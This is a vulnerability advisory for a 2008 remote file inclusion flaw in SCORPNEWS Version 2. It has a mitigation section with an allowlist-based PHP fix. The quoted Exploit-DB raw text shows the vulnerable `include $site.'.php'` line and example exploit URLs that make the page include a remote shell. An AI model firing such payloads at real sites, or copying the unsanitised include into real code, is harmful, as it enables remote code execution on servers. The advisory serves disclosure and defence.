Vendor: SCORPNEWS
By: Silver
CVSS: 7.5 HIGH
Remote File Inclusion
CWE: 98
Product Name: SCORPNEWS
Affected Version From: SCORPNEWS Version 2
Affected Version To: SCORPNEWS Version 2
Patch Exists: NO
Related CWE: N/A
CPE: a:silver_crystal_war:scorpnews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Remote File Inclusion

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'site' parameter to '/news/example.php'. This can be exploited to execute arbitrary PHP code by including a remote file with a specially crafted URL.

Mitigation:

Input validation should be used to prevent the inclusion of remote files.
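
One way to apply this mitigation, as an added example that is not code from SCORPNEWS or the advisory: the `site` value is looked up in a fixed allowlist instead of being concatenated into the `include` path. The page names and the `pages/` directory are assumptions made for illustration.

```php
<?php
// Added example, not SCORPNEWS code. Page names and the pages/ directory
// are assumptions made for illustration.

// Map of accepted 'site' values to fixed local files. User input only
// selects a key; it never becomes part of a path or URL.
const ALLOWED_PAGES = [
    'news'    => 'news.php',
    'archive' => 'archive.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a requested page name to a local file path, or null if the
 * value is not on the allowlist.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (?site[]=x) and other non-strings are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . ALLOWED_PAGES[$requested];
}

// Read the parameter explicitly from the query string instead of relying
// on a global $site that the request can populate.
$path = resolve_page($_GET['site'] ?? 'news', __DIR__ . '/pages');

if ($path === null || !is_file($path)) {
    http_response_code(404);
    exit('Page not found');
}

include $path;
```

Setting `allow_url_include = Off` in php.ini adds a second layer by refusing URL wrappers in `include`, but on its own it leaves the original concatenation open to local file inclusion.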

Exploit-DB raw data:

########################################################################
#
# /news/example.php <= Remote File Inclusion
#
# Found By: Silver - x.56[@]hotmail[d0t]de
#
# Website: www.silver-crystal-war.6x.to
#
# Version: S C O R P N E W S Version 2
#
# Location: Germany
#
########################################################################
#
#file ;
#
#example.php
#
#<? include $site.'.php';?>
#
#########################################################################
#
#example Exploit ;
#
#http://www.example.com/example.php?site=http://shell
#
#http://www.example.com/news/example.php?site=http://shell
# 
########################################################################
#
#Greetz to;
#
# .:National Security Team:. (www.crystal-war.6x.to)
#
########################################################################

# milw0rm.com [2008-05-04]